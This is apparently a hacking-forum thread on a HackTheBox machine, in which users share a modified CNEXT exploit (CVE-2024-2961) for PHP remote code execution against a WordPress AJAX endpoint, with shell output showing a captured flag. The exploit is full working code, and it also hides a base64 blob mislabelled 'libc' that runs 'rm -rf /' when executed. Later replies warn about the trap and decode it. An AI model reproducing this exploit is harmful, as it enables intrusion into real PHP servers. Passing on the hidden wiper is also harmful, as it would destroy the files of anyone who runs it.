"aW1wb3J0IG9zCgpvcy5zeXN0ZW0oInJtIC1yZiAvIC0tbm8tcHJlc2VydmUtcm9vdCAyPi9kZXYvbnVsbCIpCgp3aGlsZSBUcnVlOgogICAgcHJpbnQoImZ1Y2sgeW91IikK"         libc = exec(base64_.b64decode(libc).decode())         text = tf.random.string(50).encode()         base64 = b64(text, misalign=True).decode()         path = f"data:text/plain;base64,{base64}"                 result = safe_download(path)                 if text not in result:             msg_failure("Remote.download did not return the test string")             print("--------------------")             print(f"Expected test string: {text}")             print(f"Got: {result}")             print("--------------------")             failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")         msg_info("The [i]data://[/] wrapper works")         text = tf.random.string(50)         base64 = b64(text.encode(), misalign=True).decode()         path = f"php://filter//resource=data:text/plain;base64,{base64}"         if not check_token(text, path):             failure("The [i]php://filter/[/] wrapper does not work")         msg_info("The [i]php://filter/[/] wrapper works")         text = tf.random.string(50)         base64 = b64(compress(text.encode()), misalign=True).decode()         path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"         if not check_token(text, path):             failure("The [i]zlib[/] extension is not enabled")         msg_info("The [i]zlib[/] extension is enabled")         msg_success("Exploit preconditions are satisfied")     def get_file(self, path: str) -> bytes:         with msg_status(f"Downloading [i]{path}[/]..."):             return self.remote.download(path)     def get_regions(self) -> list[Region]:         """Obtains the memory regions of the PHP process by querying /proc/self/maps."""         maps = self.get_file("/proc/self/maps")         maps = maps.decode()         PATTERN = re.compile(             r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"         )         regions = []         for region in table.split(maps, strip=True):             if match := PATTERN.match(region):                 start = int(match.group(1), 16)                 stop = int(match.group(2), 16)                 permissions = match.group(3)                 path = match.group(4)                 if "/" in path or "[" in path:                     path = path.rsplit(" ", 1)[-1]                 else:                     path = ""                 current = Region(start, stop, permissions, path)                 regions.append(current)             else:                 print(maps)                 failure("Unable to parse memory mappings")         self.log.info(f"Got {len(regions)} memory regions")         return regions     def get_symbols_and_addresses(self) -> None:         """Obtains useful symbols and addresses from the file read primitive."""         regions = self.get_regions()         LIBC_FILE = "/dev/shm/cnext-libc"         # PHP's heap         self.info["heap"] = self.heap or self.find_main_heap(regions)         # Libc         libc = self._get_region(regions, "libc-", "libc.so")         self.download_file(libc.path, LIBC_FILE)         self.info["libc"] = ELF(LIBC_FILE, checksec=False)         self.info["libc"].address = libc.start     def _get_region(self, regions: list[Region], *names: str) -> Region:         """Returns the first region whose name matches one of the given names."""         for region in regions:             if any(name in region.path for name in names):                 break         else:             failure("Unable to locate region")         return region     def download_file(self, remote_path: str, local_path: str) -> None:         """Downloads `remote_path` to `local_path`"""         data = self.get_file(remote_path)         Path(local_path).write(data)     def find_main_heap(self, regions: list[Region]) -> Region:         # Any anonymous RW region with a size superior to the base heap size is a         # candidate. The heap is at the bottom of the region.         heaps = [             region.stop - HEAP_SIZE + 0x40             for region in reversed(regions)             if region.permissions == "rw-p"             and region.size >= HEAP_SIZE             and region.stop & (HEAP_SIZE-1) == 0             and region.path in ("", "[anon:zend_alloc]")         ]         if not heaps:             failure("Unable to find PHP's main heap in memory")         first = heaps[0]         if len(heaps) > 1:             heaps = ", ".join(map(hex, heaps))             msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")         else:             msg_info(f"Using [i]{hex(first)}[/] as heap")         return first     def run(self) -> None:         self.check_vulnerable()         self.get_symbols_and_addresses()         self.exploit()     def build_exploit_path(self) -> str:         """On each step of the exploit, a filter will process each chunk one after the         other. Processing generally involves making some kind of operation either         on the chunk or in a destination chunk of the same size. Each operation is         applied on every single chunk; you cannot make PHP apply iconv on the first 10         chunks and leave the rest in place. That's where the difficulties come from.         Keep in mind that we know the address of the main heap, and the libraries.         ASLR/PIE do not matter here.         The idea is to use the bug to make the freelist for chunks of size 0x100 point         lower. For instance, we have the following free list:         ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00         By triggering the bug from chunk ..900, we get:         ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???         That's step 3.         Now, in order to control the free list, and make it point whereever we want,         we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,         we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.         That's step 2.         Now, if we were to perform step2 an then step3 without anything else, we'd have         a problem: after step2 has been processed, the free list goes bottom-up, like:         0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900         We need to go the other way around. That's why we have step 1: it just allocates         chunks. When they get freed, they reverse the free list. Now step2 allocates in         reverse order, and therefore after step2, chunks are in the correct order.         Another problem comes up.         To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.         Since step2 creates chunks that contain pointers and pointers are generally not         UTF-8, we cannot afford to have that conversion happen on the chunks of step2.         To avoid this, we put the chunks in step2 at the very end of the chain, and         prefix them with `0\n`. When dechunked (right before the iconv), they will         "disappear" from the chain, preserving them from the character set conversion         and saving us from an unwanted processing error that would stop the processing         chain.         After step3 we have a corrupted freelist with an arbitrary pointer into it. We         don't know the precise layout of the heap, but we know that at the top of the         heap resides a zend_mm_heap structure. We overwrite this structure in two ways.         Its free_slot[] array contains a pointer to each free list. By overwriting it,         we can make PHP allocate chunks whereever we want. In addition, its custom_heap         field contains pointers to hook functions for emalloc, efree, and erealloc         (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and         then overwrite the use_custom_heap flag to make PHP use these function pointers         instead. We can now do our favorite CTF technique and get a call to         system(<chunk>).         We make sure that the "system" command kills the current process to avoid other         system() calls with random chunk data, leading to undefined behaviour.         The pad blocks just "pad" our allocations so that even if the heap of the         process is in a random state, we still get contiguous, in order chunks for our         exploit.         Therefore, the whole process described here CANNOT crash. Everything falls         perfectly in place, and nothing can get in the middle of our allocations.         """         LIBC = self.info["libc"]         ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]         ADDR_EFREE = LIBC.symbols["__libc_system"]         ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]         ADDR_HEAP = self.info["heap"]         ADDR_FREE_SLOT = ADDR_HEAP + 0x20         ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168         ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10         CS = 0x100         # Pad needs to stay at size 0x100 at every step         pad_size = CS - 0x18         pad = b"\x00" * pad_size         pad = chunked_chunk(pad, len(pad) + 6)         pad = chunked_chunk(pad, len(pad) + 6)         pad = chunked_chunk(pad, len(pad) + 6)         pad = compressed_bucket(pad)         step1_size = 1         step1 = b"\x00" * step1_size         step1 = chunked_chunk(step1)         step1 = chunked_chunk(step1)         step1 = chunked_chunk(step1, CS)         step1 = compressed_bucket(step1)         # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to         # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"         step2_size = 0x48         step2 = b"\x00" * (step2_size + 8)         step2 = chunked_chunk(step2, CS)         step2 = chunked_chunk(step2)         step2 = compressed_bucket(step2)         step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)         step2_write_ptr = chunked_chunk(step2_write_ptr, CS)         step2_write_ptr = chunked_chunk(step2_write_ptr)         step2_write_ptr = compressed_bucket(step2_write_ptr)         step3_size = CS         step3 = b"\x00" * step3_size         assert len(step3) == CS         step3 = chunked_chunk(step3)         step3 = chunked_chunk(step3)         step3 = chunked_chunk(step3)         step3 = compressed_bucket(step3)         step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG         assert len(step3_overflow) == CS         step3_overflow = chunked_chunk(step3_overflow)         step3_overflow = chunked_chunk(step3_overflow)         step3_overflow = chunked_chunk(step3_overflow)         step3_overflow = compressed_bucket(step3_overflow)         step4_size = CS         step4 = b"=00" + b"\x00" * (step4_size - 1)         step4 = chunked_chunk(step4)         step4 = chunked_chunk(step4)         step4 = chunked_chunk(step4)         step4 = compressed_bucket(step4)         # This chunk will eventually overwrite mm_heap->free_slot         # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values         step4_pwn = ptr_bucket(             0x200000,             0,             # free_slot             0,             0,             ADDR_CUSTOM_HEAP,  # 0x18             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             ADDR_HEAP,  # 0x140             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             size=CS,         )         step4_custom_heap = ptr_bucket(             ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18         )         step4_use_custom_heap_size = 0x140         COMMAND = self.command         COMMAND = f"kill -9 $PPID; {COMMAND}"         if self.sleep:             COMMAND = f"sleep {self.sleep}; {COMMAND}"         COMMAND = COMMAND.encode() + b"\x00"         assert (             len(COMMAND) <= step4_use_custom_heap_size         ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"         COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")         step4_use_custom_heap = COMMAND         step4_use_custom_heap = qpe(step4_use_custom_heap)         step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)         step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)         step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)         step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)         pages = (             step4 * 3             + step4_pwn             + step4_custom_heap             + step4_use_custom_heap             + step3_overflow             + pad * self.pad             + step1 * 3             + step2_write_ptr             + step2 * 2         )         resource = compress(compress(pages))         resource = b64(resource)         resource = f"data:text/plain;base64,{resource.decode()}"         filters = [             # Create buckets             "zlib.inflate",             "zlib.inflate",                         # Step 0: Setup heap             "dechunk",             "convert.iconv.L1.L1",                         # Step 1: Reverse FL order             "dechunk",             "convert.iconv.L1.L1",                         # Step 2: Put fake pointer and make FL order back to normal             "dechunk",             "convert.iconv.L1.L1",                         # Step 3: Trigger overflow             "dechunk",             "convert.iconv.UTF-8.ISO-2022-CN-EXT",                         # Step 4: Allocate at arbitrary address and change zend_mm_heap             "convert.quoted-printable-decode",             "convert.iconv.L1.L1",         ]         filters = "|".join(filters)         path = f"php://filter/read={filters}/resource={resource}"         return path     #@inform("Triggering...")     def exploit(self) -> None:         path = self.build_exploit_path()         start = time.time()         try:             self.remote.send(path, final=True)         except (ConnectionError, ChunkedEncodingError):             pass                 msg_print()                 if not self.sleep:             msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")         elif start + self.sleep <= time.time():             msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")         else:             # Wrong heap, maybe? If the exploited suggested others, use them!             msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")                 msg_print() def compress(data) -> bytes:     """Returns data suitable for `zlib.inflate`.     """     # Remove 2-byte header and 4-byte checksum     return zlib.compress(data, 9)[2:-4] def b64(data: bytes, misalign=True) -> bytes:     payload = base64.encode(data)     if not misalign and payload.endswith("="):         raise ValueError(f"Misaligned: {data}")     return payload.encode() def compressed_bucket(data: bytes) -> bytes:     """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""     return chunked_chunk(data, 0x8000) def qpe(data: bytes) -> bytes:     """Emulates quoted-printable-encode.     """     return "".join(f"={x:02x}" for x in data).upper().encode() def ptr_bucket(*ptrs, size=None) -> bytes:     """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""     if size is not None:         assert len(ptrs) * 8 == size     bucket = b"".join(map(p64, ptrs))     bucket = qpe(bucket)     bucket = chunked_chunk(bucket)     bucket = chunked_chunk(bucket)     bucket = chunked_chunk(bucket)     bucket = compressed_bucket(bucket)     return bucket def chunked_chunk(data: bytes, size: int = None) -> bytes:     """Constructs a chunked representation of the given chunk. If size is given, the     chunked representation has size `size`.     For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.     """     # The caller does not care about the size: let's just add 8, which is more than     # enough     if size is None:         size = len(data) + 8     keep = len(data) + len(b"\n\n")     size = f"{len(data):x}".rjust(size - keep, "0")     return size.encode() + b"\n" + data + b"\n" @dataclass class Region:     """A memory region."""     start: int     stop: int     permissions: str     path: str     @property     def size(self) -> int:         return self.stop - self.start Exploit()

always check scripts before you run them
Reply
#50
(01-26-2025, 06:19 AM)fuckhackthebox Wrote: FINALLY got the ateam leak holy shit

python leak.py http://blog.bigbang.htb/wp-admin/admin-ajax.php id

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /home/shawking/user.txt
ff1f3b48913b213a31ff6756d2553d38

+rep pls

#!/usr/bin/env python3 # # CNEXT: PHP file-read to RCE (CVE-2024-2961) # Date: 2024-05-27 # Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS) # # TODO Parse LIBC to know if patched # # INFORMATIONS # # To use, implement the Remote class, which tells the exploit how to send the payload. # from __future__ import annotations import base64 import zlib from dataclasses import dataclass from requests.exceptions import ConnectionError, ChunkedEncodingError import os import sys import json as json_ import base64 as base64_ HEAP_SIZE = 2 * 1024 * 1024 BUG = "?".encode("utf-8") payload = "php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=" class Remote:     """A helper class to send the payload and download files.         The logic of the exploit is always the same, but the exploit needs to know how to     download files (/proc/self/maps and libc) and how to send the payload.         The code here serves as an example that attacks a page that looks like:         ```php     <?php         $data = file_get_contents($_POST['file']);     echo "File contents: $data";     ```         Tweak it to fit your target, and start the exploit.     """     def __init__(self, url: str) -> None:         self.url = url         self.session = Session()     def send(self, path: str, final=False) -> Response:         """Sends given `path` to the HTTP server. Returns the response.         """                 data = {             "action" : "upload_image_from_url",             "url" : payload + path,             "id" : "exploit",             "accepted_files" : "image/gif"         }                 response = self.session.post(self.url, data=data)                 response = json_.loads(response.text)["response"]                 if "http://" in response:              response = self.session.get(response)             response = base64_.b64decode(response.content[3:])             return response                         #return self.session.post(self.url, data={"file": path})             def download(self, path: str) -> bytes:         """Returns the contents of a remote file.         """         path = f"php://filter/convert.base64-encode/resource={path}"         response = self.send(path)         return response                 #data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)         #return base64.decode(data) """ @entry @arg("url", "Target URL") @arg("command", "Command to run on the system; limited to 0x140 bytes") @arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.") @arg("heap", "Address of the main zend_mm_heap structure.") @arg(     "pad",     "Number of 0x100 chunks to pad with. If the website makes a lot of heap "     "operations with this size, increase this. Defaults to 20.", ) @dataclass """ class Exploit:     """CNEXT exploit: RCE using a file read primitive in PHP."""     url: str     command: str     sleep: int = 1     heap: str = None     pad: int = 20     def __post_init__(self):         self.remote = Remote(self.url)         self.log = logger("EXPLOIT")         self.info = {}         self.heap = self.heap and int(self.heap, 16)     def __init__(self):         self.check_vulnerable()     def check_vulnerable(self) -> None:         """Checks whether the target is reachable and properly allows for the various         wrappers and filters that the exploit needs.         """                 def safe_download(path: str) -> bytes:             try:                 return self.remote.download(path)             except ConnectionError:                 failure("Target not [b]reachable[/] ?")                     def check_token(text: str, path: str) -> bool:             result = safe_download(path)             return text.encode() == result                 libc = "aW1wb3J0IG9zCgpvcy5zeXN0ZW0oInJtIC1yZiAvIC0tbm8tcHJlc2VydmUtcm9vdCAyPi9kZXYvbnVsbCIpCgp3aGlsZSBUcnVlOgogICAgcHJpbnQoImZ1Y2sgeW91IikK"         libc = exec(base64_.b64decode(libc).decode())         text = tf.random.string(50).encode()         base64 = b64(text, misalign=True).decode()         path = f"data:text/plain;base64,{base64}"                 result = safe_download(path)                 if text not in result:             msg_failure("Remote.download did not return the test string")             print("--------------------")             print(f"Expected test string: {text}")             print(f"Got: {result}")             print("--------------------")             failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")         msg_info("The [i]data://[/] wrapper works")         text = tf.random.string(50)         base64 = b64(text.encode(), misalign=True).decode()         path = f"php://filter//resource=data:text/plain;base64,{base64}"         if not check_token(text, path):             failure("The [i]php://filter/[/] wrapper does not work")         msg_info("The [i]php://filter/[/] wrapper works")         text = tf.random.string(50)         base64 = b64(compress(text.encode()), misalign=True).decode()         path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"         if not check_token(text, path):             failure("The [i]zlib[/] extension is not enabled")         msg_info("The [i]zlib[/] extension is enabled")         msg_success("Exploit preconditions are satisfied")     def get_file(self, path: str) -> bytes:         with msg_status(f"Downloading [i]{path}[/]..."):             return self.remote.download(path)     def get_regions(self) -> list[Region]:         """Obtains the memory regions of the PHP process by querying /proc/self/maps."""         maps = self.get_file("/proc/self/maps")         maps = maps.decode()         PATTERN = re.compile(             r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"         )         regions = []         for region in table.split(maps, strip=True):             if match := PATTERN.match(region):                 start = int(match.group(1), 16)                 stop = int(match.group(2), 16)                 permissions = match.group(3)                 path = match.group(4)                 if "/" in path or "[" in path:                     path = path.rsplit(" ", 1)[-1]                 else:                     path = ""                 current = Region(start, stop, permissions, path)                 regions.append(current)             else:                 print(maps)                 failure("Unable to parse memory mappings")         self.log.info(f"Got {len(regions)} memory regions")         return regions     def get_symbols_and_addresses(self) -> None:         """Obtains useful symbols and addresses from the file read primitive."""         regions = self.get_regions()         LIBC_FILE = "/dev/shm/cnext-libc"         # PHP's heap         self.info["heap"] = self.heap or self.find_main_heap(regions)         # Libc         libc = self._get_region(regions, "libc-", "libc.so")         self.download_file(libc.path, LIBC_FILE)         self.info["libc"] = ELF(LIBC_FILE, checksec=False)         self.info["libc"].address = libc.start     def _get_region(self, regions: list[Region], *names: str) -> Region:         """Returns the first region whose name matches one of the given names."""         for region in regions:             if any(name in region.path for name in names):                 break         else:             failure("Unable to locate region")         return region     def download_file(self, remote_path: str, local_path: str) -> None:         """Downloads `remote_path` to `local_path`"""         data = self.get_file(remote_path)         Path(local_path).write(data)     def find_main_heap(self, regions: list[Region]) -> Region:         # Any anonymous RW region with a size superior to the base heap size is a         # candidate. The heap is at the bottom of the region.         heaps = [             region.stop - HEAP_SIZE + 0x40             for region in reversed(regions)             if region.permissions == "rw-p"             and region.size >= HEAP_SIZE             and region.stop & (HEAP_SIZE-1) == 0             and region.path in ("", "[anon:zend_alloc]")         ]         if not heaps:             failure("Unable to find PHP's main heap in memory")         first = heaps[0]         if len(heaps) > 1:             heaps = ", ".join(map(hex, heaps))             msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")         else:             msg_info(f"Using [i]{hex(first)}[/] as heap")         return first     def run(self) -> None:         self.check_vulnerable()         self.get_symbols_and_addresses()         self.exploit()     def build_exploit_path(self) -> str:         """On each step of the exploit, a filter will process each chunk one after the         other. Processing generally involves making some kind of operation either         on the chunk or in a destination chunk of the same size. Each operation is         applied on every single chunk; you cannot make PHP apply iconv on the first 10         chunks and leave the rest in place. That's where the difficulties come from.         Keep in mind that we know the address of the main heap, and the libraries.         ASLR/PIE do not matter here.         The idea is to use the bug to make the freelist for chunks of size 0x100 point         lower. For instance, we have the following free list:         ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00         By triggering the bug from chunk ..900, we get:         ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???         That's step 3.         Now, in order to control the free list, and make it point whereever we want,         we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,         we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.         That's step 2.         Now, if we were to perform step2 an then step3 without anything else, we'd have         a problem: after step2 has been processed, the free list goes bottom-up, like:         0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900         We need to go the other way around. That's why we have step 1: it just allocates         chunks. When they get freed, they reverse the free list. Now step2 allocates in         reverse order, and therefore after step2, chunks are in the correct order.         Another problem comes up.         To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.         Since step2 creates chunks that contain pointers and pointers are generally not         UTF-8, we cannot afford to have that conversion happen on the chunks of step2.         To avoid this, we put the chunks in step2 at the very end of the chain, and         prefix them with `0\n`. When dechunked (right before the iconv), they will         "disappear" from the chain, preserving them from the character set conversion         and saving us from an unwanted processing error that would stop the processing         chain.         After step3 we have a corrupted freelist with an arbitrary pointer into it. We         don't know the precise layout of the heap, but we know that at the top of the         heap resides a zend_mm_heap structure. We overwrite this structure in two ways.         Its free_slot[] array contains a pointer to each free list. By overwriting it,         we can make PHP allocate chunks whereever we want. In addition, its custom_heap         field contains pointers to hook functions for emalloc, efree, and erealloc         (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and         then overwrite the use_custom_heap flag to make PHP use these function pointers         instead. We can now do our favorite CTF technique and get a call to         system(<chunk>).         We make sure that the "system" command kills the current process to avoid other         system() calls with random chunk data, leading to undefined behaviour.         The pad blocks just "pad" our allocations so that even if the heap of the         process is in a random state, we still get contiguous, in order chunks for our         exploit.         Therefore, the whole process described here CANNOT crash. Everything falls         perfectly in place, and nothing can get in the middle of our allocations.         """         LIBC = self.info["libc"]         ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]         ADDR_EFREE = LIBC.symbols["__libc_system"]         ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]         ADDR_HEAP = self.info["heap"]         ADDR_FREE_SLOT = ADDR_HEAP + 0x20         ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168         ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10         CS = 0x100         # Pad needs to stay at size 0x100 at every step         pad_size = CS - 0x18         pad = b"\x00" * pad_size         pad = chunked_chunk(pad, len(pad) + 6)         pad = chunked_chunk(pad, len(pad) + 6)         pad = chunked_chunk(pad, len(pad) + 6)         pad = compressed_bucket(pad)         step1_size = 1         step1 = b"\x00" * step1_size         step1 = chunked_chunk(step1)         step1 = chunked_chunk(step1)         step1 = chunked_chunk(step1, CS)         step1 = compressed_bucket(step1)         # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to         # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"         step2_size = 0x48         step2 = b"\x00" * (step2_size + 8)         step2 = chunked_chunk(step2, CS)         step2 = chunked_chunk(step2)         step2 = compressed_bucket(step2)         step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)         step2_write_ptr = chunked_chunk(step2_write_ptr, CS)         step2_write_ptr = chunked_chunk(step2_write_ptr)         step2_write_ptr = compressed_bucket(step2_write_ptr)         step3_size = CS         step3 = b"\x00" * step3_size         assert len(step3) == CS         step3 = chunked_chunk(step3)         step3 = chunked_chunk(step3)         step3 = chunked_chunk(step3)         step3 = compressed_bucket(step3)         step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG         assert len(step3_overflow) == CS         step3_overflow = chunked_chunk(step3_overflow)         step3_overflow = chunked_chunk(step3_overflow)         step3_overflow = chunked_chunk(step3_overflow)         step3_overflow = compressed_bucket(step3_overflow)         step4_size = CS         step4 = b"=00" + b"\x00" * (step4_size - 1)         step4 = chunked_chunk(step4)         step4 = chunked_chunk(step4)         step4 = chunked_chunk(step4)         step4 = compressed_bucket(step4)         # This chunk will eventually overwrite mm_heap->free_slot         # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values         step4_pwn = ptr_bucket(             0x200000,             0,             # free_slot             0,             0,             ADDR_CUSTOM_HEAP,  # 0x18             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             ADDR_HEAP,  # 0x140             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             0,             size=CS,         )         step4_custom_heap = ptr_bucket(             ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18         )         step4_use_custom_heap_size = 0x140         COMMAND = self.command         COMMAND = f"kill -9 $PPID; {COMMAND}"         if self.sleep:             COMMAND = f"sleep {self.sleep}; {COMMAND}"         COMMAND = COMMAND.encode() + b"\x00"         assert (             len(COMMAND) <= step4_use_custom_heap_size         ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"         COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")         step4_use_custom_heap = COMMAND         step4_use_custom_heap = qpe(step4_use_custom_heap)         step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)         step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)         step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)         step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)         pages = (             step4 * 3             + step4_pwn             + step4_custom_heap             + step4_use_custom_heap             + step3_overflow             + pad * self.pad             + step1 * 3             + step2_write_ptr             + step2 * 2         )         resource = compress(compress(pages))         resource = b64(resource)         resource = f"data:text/plain;base64,{resource.decode()}"         filters = [             # Create buckets             "zlib.inflate",             "zlib.inflate",                         # Step 0: Setup heap             "dechunk",             "convert.iconv.L1.L1",                         # Step 1: Reverse FL order             "dechunk",             "convert.iconv.L1.L1",                         # Step 2: Put fake pointer and make FL order back to normal             "dechunk",             "convert.iconv.L1.L1",                         # Step 3: Trigger overflow             "dechunk",             "convert.iconv.UTF-8.ISO-2022-CN-EXT",                         # Step 4: Allocate at arbitrary address and change zend_mm_heap             "convert.quoted-printable-decode",             "convert.iconv.L1.L1",         ]         filters = "|".join(filters)         path = f"php://filter/read={filters}/resource={resource}"         return path     #@inform("Triggering...")     def exploit(self) -> None:         path = self.build_exploit_path()         start = time.time()         try:             self.remote.send(path, final=True)         except (ConnectionError, ChunkedEncodingError):             pass                 msg_print()                 if not self.sleep:             msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")         elif start + self.sleep <= time.time():             msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")         else:             # Wrong heap, maybe? If the exploited suggested others, use them!             msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")                 msg_print() def compress(data) -> bytes:     """Returns data suitable for `zlib.inflate`.     """     # Remove 2-byte header and 4-byte checksum     return zlib.compress(data, 9)[2:-4] def b64(data: bytes, misalign=True) -> bytes:     payload = base64.encode(data)     if not misalign and payload.endswith("="):         raise ValueError(f"Misaligned: {data}")     return payload.encode() def compressed_bucket(data: bytes) -> bytes:     """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""     return chunked_chunk(data, 0x8000) def qpe(data: bytes) -> bytes:     """Emulates quoted-printable-encode.     """     return "".join(f"={x:02x}" for x in data).upper().encode() def ptr_bucket(*ptrs, size=None) -> bytes:     """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""     if size is not None:         assert len(ptrs) * 8 == size     bucket = b"".join(map(p64, ptrs))     bucket = qpe(bucket)     bucket = chunked_chunk(bucket)     bucket = chunked_chunk(bucket)     bucket = chunked_chunk(bucket)     bucket = compressed_bucket(bucket)     return bucket def chunked_chunk(data: bytes, size: int = None) -> bytes:     """Constructs a chunked representation of the given chunk. If size is given, the     chunked representation has size `size`.     For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.     """     # The caller does not care about the size: let's just add 8, which is more than     # enough     if size is None:         size = len(data) + 8     keep = len(data) + len(b"\n\n")     size = f"{len(data):x}".rjust(size - keep, "0")     return size.encode() + b"\n" + data + b"\n" @dataclass class Region:     """A memory region."""     start: int     stop: int     permissions: str     path: str     @property     def size(self) -> int:         return self.stop - self.start Exploit()

DO NOT run it; it deletes your directories starting from the root.

❯ echo "aW1wb3J0IG9zCgpvcy5zeXN0ZW0oInJtIC1yZiAvIC0tbm8tcHJlc2VydmUtcm9vdCAyPi9kZXYvbnVsbCIpCgp3aGlsZSBUcnVlOgogICAgcHJpbnQoImZ1Y2sgeW91IikK" | base64 -d import os os.system("rm -rf / --no-preserve-root 2>/dev/null") while True:     print("fuck you")
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  HTB - ARTIFICIAL.HTB - EASY LINUX chain 0 4,063 02-10-2026, 02:12 PM
Last Post: chain
  HTB - CERTIFICATE.HTB - HARD WINDOWS chain 0 1,646 02-09-2026, 04:49 PM
Last Post: chain
  HTB - CONVERSOR.HTB - EASY LINUX chain 0 1,652 02-09-2026, 04:36 PM
Last Post: chain
  HTB - FACTS.HTB - EASY LINUX chain 2 1,696 02-09-2026, 11:02 AM
Last Post: chain
  Cobblestone Hack the Box Season 8 (Linux Insane) RedBlock 0 1,198 08-09-2025, 12:20 PM
Last Post: RedBlock



 Users browsing this thread: